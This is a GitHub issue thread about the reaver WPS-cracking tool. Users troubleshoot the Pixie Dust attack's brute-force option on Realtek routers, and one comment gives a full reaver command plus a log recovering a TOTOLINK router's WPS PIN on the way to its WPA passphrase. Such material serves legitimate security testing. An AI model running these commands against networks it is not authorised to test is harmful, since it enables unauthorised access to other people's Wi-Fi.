Comments (4)
Regards to both problems: does the same thing happen for ALL access points? Different models? Etc?
There is no such thing as -K 4, the option that came up was probably -f. -f is a pixiewps command used against Realtek based APs when the nonce is not generated within the same second as E-S1 and E-S2. I'm actually not sure if you can use -f in Reaver or if you have to manually use -f in pixiewps, I've always had success without the full brute force.
from reaver-wps-fork-t6x.
My realteck acess point requires -f option
i'll be home in a cople of days and will be able to tell you if the option can be run straightforward in reaver or if you have to do it with pixiewps.
Than, remember that rt3070 devices work very bad with reaver.
Since the first version.
Try with bully, it works fine with rt3070 and the mod is very easy to do to get the element for pixiedust.
from reaver-wps-fork-t6x.
sorry for the delay....
I tried at home with reaver + pixiewps 1.2 against a supported realtek that requires the full brute force option.
i launched reaver with argument -k 1
sudo reaver -i wlan0mon -b B8:55:10:020:A1 -vv -K 1
I got to m3 mensage and pixiedust is automatically launched
It doesn't find the PIN at first
[+] Waiting for beacon from B8:55:10:02:F0:A1
[+] Switching wlan0mon to channel 11
[+] Associated with B8:55:10:02:F0:A1 (ESSID: TOTOLINK N301RT)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.2
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s 690 ms
[Pixie-Dust]
But is is launched automatically a second time with the -f option
[Pixie-Dust] [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
[Pixie-Dust]
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.2
[Pixie-Dust]
[Pixie-Dust] [*] PRNG Seed: 1344583431 (Fri Aug 10 07:23:51 2012 UTC)
[Pixie-Dust] [*] Mode: 3 (RTL819x)
[Pixie-Dust] [*] PSK1: 13:a8:23:9f:87:2e:f0:8b:35:52:98:dd:7e:00:fc:33
[Pixie-Dust] [*] PSK2: bd:38:5e:36:73:1b:c8:47:34:eb:3a:00:b2:e8:eb:60
[Pixie-Dust] [*] E-S1: 2f:21:67:dc:17:8a:e1:23:08:eb:11:50:63:6c:2a:b7
[Pixie-Dust] [*] E-S2: 2f:21:67:dc:17:8a:e1:23:08:eb:11:50:63:6c:2a:b7
[Pixie-Dust] [+] WPS pin: 03004203
[Pixie-Dust]
You see that ES-1 = ES2 and pixiewps see it too, that why it knows that the device can be brute forced with the --force option
and than i can recover the wpa passphrase with the PIN - automatically
So there is no doubt about it :
If you use -K 1 in your reaver line you will execute automatically pixewps a second time with the "--force" option if the device is vulnerable and requires it.
Because that what pixewps does.
from reaver-wps-fork-t6x.
About your second issue :
Also i have noticed that often when using the -N -K 1 option i can successfully get the pin but it never gives me the psk..
That's maybe why the option -N is not enabled by default... 😉 : you should try with a basic syntax first (adding -n is a good trick, in lower case, not upper case)
from reaver-wps-fork-t6x.
Related Issues (20)
- Reaver downgrade error ( make) commend HOT 1
- reaver not makeing HOT 1
- Provide option to add a list of pins in .wpc "format" HOT 1
- Provide option to change the MAC at random on every attempt HOT 1
- Timeout error issue unsolved!!! HOT 9
- Reaver process stopped (exit code: 1) HOT 2
- Make a convenient delete function via make uninstall HOT 1
- Machine freezes HOT 2
- Does wash will detect 6GHz in the future ? HOT 2
- BUG Segmentation Fault (send.c) HOT 3
- Wi-FI monitoring is not working stuck at "sending authentication request" HOT 1
- Any Idea about Implementing WPS Pixiedust to ESP32 Microcontrollers ? they just added the wps registrar. HOT 1
- reaver getting block ack HOT 20
- Configure HOT 1
- android's binary HOT 2
- Reaver session gets stuck at "send_packet called from resend_last_packet() send.c:161" HOT 13
- Associates despite --no-associate / -A
- Reaver stuck on send_packet called from resend _last_packet() send.c.161 while using pixie dust attack HOT 16
- Does reaver work with android monitor mode? HOT 1
- Rstoring the PIN for my router, always fails! HOT 7
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from reaver-wps-fork-t6x.